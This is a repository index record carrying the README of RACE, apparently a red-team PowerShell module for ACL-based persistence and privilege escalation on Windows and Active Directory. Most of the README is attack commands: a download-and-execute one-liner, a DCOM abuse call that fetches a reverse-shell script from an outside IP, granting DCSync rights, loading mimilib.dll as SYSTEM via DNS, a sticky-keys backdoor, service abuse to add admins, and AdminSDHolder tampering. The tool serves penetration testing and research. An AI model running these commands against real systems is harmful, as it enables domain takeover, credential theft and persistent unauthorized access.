{"id":13712378,"url":"https://github.com/samratashok/RACE","last_synced_at":"2025-05-06T22:31:09.043Z","repository":{"id":54880877,"uuid":"198853198","full_name":"samratashok/RACE","owner":"samratashok","description":"RACE is a PowerShell module for executing ACL attacks against Windows targets.","archived":false,"fork":false,"pushed_at":"2023-05-05T15:33:54.000Z","size":92,"stargazers_count":219,"open_issues_count":2,"forks_count":61,"subscribers_count":7,"default_branch":"master","last_synced_at":"2025-04-03T03:09:26.210Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/samratashok.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2019-07-25T15:04:58.000Z","updated_at":"2025-04-02T10:00:44.000Z","dependencies_parsed_at":"2022-08-14T05:31:20.209Z","dependency_job_id":"71ad0c1b-fcf2-4cf4-bd0b-7e57933e9171","html_url":"https://github.com/samratashok/RACE","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/samratashok%2FRACE","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/samratashok%2FRACE/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/samratashok%2FRACE/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/samratashok%2FRACE/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/samratashok","download_url":"https://codeload.github.com/samratashok/RACE/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":252778973,"owners_count":21802860,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-02T23:01:17.791Z","updated_at":"2025-05-06T22:31:08.776Z","avatar_url":"https://github.com/samratashok.png","language":"PowerShell","funding_links":[],"categories":["Enable DSRM Admin Login"],"sub_categories":["Remove protections such as PPL and bypass Credential Guard"],"readme":"# RACE\n### RACE is a PowerShell module for executing ACL attacks against Windows targets and Active Directory. RACE can be used for persistence and on demand privilege escalationon Windows machines. \n### By [nikhil_mitt](https://twitter.com/nikhil_mitt)\n\n### Usage\n\nNote that RACE is a tool which is used after you have admin or DA (in case of DC) privileges. \nThe introductory blog post is available here: https://www.labofapenetrationtester.com/2019/08/race.html\n\nImport the module in current PowerShell session\n```powershell\nPS C:\\\u003e Import-Module C:\\RACE-master\\RACE.psd1\n```\nUse dot sourcing\n```powershell\nPS C:\\\u003e . C:\\RACE-master\\RACE.ps1\n```\nDownload and execute\n```powershell\niex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/RACE/master/RACE.ps1')\n```\n\nGet help about any function\n```powershell\nPS C:\\\u003e Get-Help Set-DCPermissions -Full\n```\n### Functions\n\nNote that the functions Set-ADACL and Set-DCPermissions need Microsoft ActiveDirectory module. You can get it from a DC or from my GitHub: https://github.com/samratashok/ADModule\n\n### Set-RemotePSRemoting\nUse this function to modify ACL of PowerShell Remoting endpoint so that you can access the target machine without admin.\n```powershell\nPS C:\\\u003e Set-RemotePSRemoting -SamAccountName labuser -ComputerName ops-dc\n```\nUse the above command to add permissions on the remote machine for labuser to access PowerShell remoting.\n\n```powershell\nPS C:\\\u003e Set-RemotePSRemoting -SamAccountName labuser -ComputerName ops-dc -Credential ops\\administrator\n```\nUse the above command to add permissions on the remote machine for labuser to access PowerShell remoting using explicit credentials.\n\n### Set-RemoteWMI\nUse this function to modify ACL of DCOM endpoint and all the namespaces so that you can access the target machine without admin.\n```powershell\nPS C:\\\u003e Set-RemoteWMI -SamAccountName labuser -ComputerName ops-dc\n```\nUse the above command to add permissions on the remote machine for labuser to access PowerShell remoting.\n\n### Set-RemoteServicePermissions and Set-RemoteServiceAbuse\nUse these tmodify ACLs of services on windows machines. \n\n```powershell\nPS C:\\\u003e Set-RemoteServicePermissions -SamAccountName labuser -ComputerName ops-mssql -ServiceName ALG -Verbose\n```\nUse the above command to modify ACL of 'ALG' service on ops-mssql to allow labuser to modify the service (gives 'CCDCLCSWRPWPDTLOCRSDRCWDWO' rights)\n\n```powershell\nPS C:\\\u003e Set-RemoteServiceAbuse -ComputerName ops-mssql -UserName 'labuser' -ServiceName ALG -Verbose\n```\nRun the above command as 'labuser' to configure ALG to run as SYSTEM and modify its executable path to add 'labuser'\nor other Principal provided in the UserName parameter to the local adminisrators group on the target machines. \n\n```powershell\nPS C:\\\u003e sc.exe \\\\ops-mssql start ALG\n```\nRun the above command as 'labuser' to execute the payload set as executable of ALG\n\n### Set-RemoteRegistryPermissions\nFunction which can be used to modify permissions of Remote Registry by modifying a registry key on local or remote machine.\n\n```powershell\nPS C:\\\u003e Set-RemoteRegistryPermissions -SamAccountName labuser -ComputerName ops-mssql -Verbose \n```\nUse the above command to modify permissions of the 'Remote Registry' key on the target machine to allow 'labuser' \naccess to Remote Registry. \n\n### Set-RegistryImageFileExecution and Invoke-RegistryAbuse\nSet-RegistryImageFileExecution mdifies the Permissions for the registry key 'HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options' and 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp'.\n\n```powershell\nPS C:\\\u003e Set-RegistryImageFileExecution -SamAccountName labuser -ComputerName ops-mssql -Verbose \n```\nUse the above command to modify permissions of the 'Image File Execution Options' key on the target machine to allow 'labuser' \npermissions to modify the key and its subkeys. \n```powershell\nPS C:\\\u003e Invoke-RegistryAbuse -ComputerName ops-mssql -Method ImageFileExecution -Verbose \n```\nAbove command sets payload for sethc (sticky keys) and disables NLA.\n\n### Set-DCOMPermissions and Invoke-DCOMAbuse\nSet-DCOMPermissions can be used to modify ACLs of DCOM provide non-admin Princiapls access to DCOM.\n\n```powershell\nPS C:\\\u003e Set-DCOMPermissions -UserName labuser -ComputerName ops-mssql -Verbose \n```\nUse the above command to add permissions on the target machine for labuser to execute commands using DCOM.\nThen use Invoke-DCOMAbuse as labuser to run commands:\n```powershell\nInvoke-DCOMAbuse -ComputerName ops-build -Method MMC20 -Arguments 'iex(iwr -UseBasicParsing http://192.168.100.31:8080/Invoke-PowerShellTcp.ps1)'\n```\n\n### Set-JEAPermissions\nFunction which can be used to create a new JEA endpoint for PowerShell remoting to provide access for non-admin Principals. \n```powershell\nPS C:\\\u003e Set-JEAPermissions -ComputerName ops-build -SamAccountName labuser -Verbose \n```\nUse the above command to create a new JEA endpoint on the target machine which provides administrator privileges. \n\nUse the below command to connect to the target machine. Note the -ConfigurationName parameter:\n```powershell\nPS C:\\\u003e Enter-PSSession -ComputerName ops-build -ConfigurationName microsoft.powershell64 \n```\n\n### Set-ADACL\nThe function can set ACL of a domain object specified by TargetSamAccountName or DistinguishedName.\n\nIt requires Microsoft's Active Directory module. You either need the AD RSAT tools (available on DC) or get the module \nfrom here: https://github.com/samratashok/ADModule\n\n```powershell\nPS C:\\\u003e Set-ADACL -SamAccountName labuser -DistinguishedName 'DC=powershell,DC=local' -GUIDRight DCSync -Server powershell.local -Verbose\n```\nUse the above command to modify ACL of the domain object powershell.local to add DCSync rights for 'labuser'.\n\n### Set-DNSAbusePermissions and Invoke-DNSAbuse\nUse Set-DNSAbusePermissions to modify ACL of DNS Server Object and permissions for the DNS service.\n```powershell\nPS C:\\\u003e Set-DNSAbusePermissions -SAMAccountName labuser -DistinguishedName 'CN=MicrosoftDNS,CN=System,DC=offensiveps,DC=powershell,DC=local' -ComputerName ops-dc -Verbose\n```\nUse the above command to modify ACL of DNS Server to add permissions for labuser so that it can remotely load DLLs as SYSTEM on the DNS Server.\n\nUse the below command (needs DNS Server module that is available with DNS RSAT) to load the DLL.\n```powershell\nPS C:\\\u003e Invoke-DNSAbuse -ComputerName ops-dc -DLLPath \\\\ops-build\\dll\\mimilib.dll -Verbose \n```\n\n### Set-DCPermissions\nFunction to modify ACL of domain objects for specific attacks.\n```powershell\nSet-DCPermissions -Method AdminSDHolder -SAMAccountName labuser -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=offensiveps,DC=powershell,DC=local' -Verbose \n```\nUse the above command to modify ACL of the AdminSDHolder to allow labuser permissions to modify ACL of AdminSDHolder.\nUsing these permissions, labuser can change ACL of AdminSDHolder and get rights over all the Protected Groups.\n\n```powershell\nSet-DCPermissions -Method RBCD -DistinguishedName 'CN=OPS-FILE,OU=Servers,DC=offensiveps,DC=powershell,DC=local' -SAMAccountName labuser -Verbose \n```\nUse the above command to modify ACL of OPS-FILE$ user to add permissions for labuser to configure Resource-based Constrained Delegation.\n\n### Set-DCShadowPermissions\nFunction to modify ACL of multiple domain objects to allow DCShadow execution without Domain Admin privilges\n\n```powershell\nPS C:\\\u003e Set-DCShadowPermissions -FakeDC emptest -SAMAccountName testuser -Username privuser -Verbose \nUse the above command to modify ACLs to run DCShadow from ps-paw machine as privuser against testuser.\n```\n### Bugs, Feedback and Feature Requests\nPlease raise an issue if you encounter a bug or have a feature request.\\\n\n### Contributing\nYou can contribute by fixing bugs or contributing to the code. If you cannot code, please use the tool and provide feedback and bugs!\n\n### Supporting material\n\nThe introductory blog post is available here: https://www.labofapenetrationtester.com/2019/08/race.html\nThe above post contains slides and videos for the DEF CON27 talk for this tool.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsamratashok%2FRACE","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsamratashok%2FRACE","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsamratashok%2FRACE/lists"}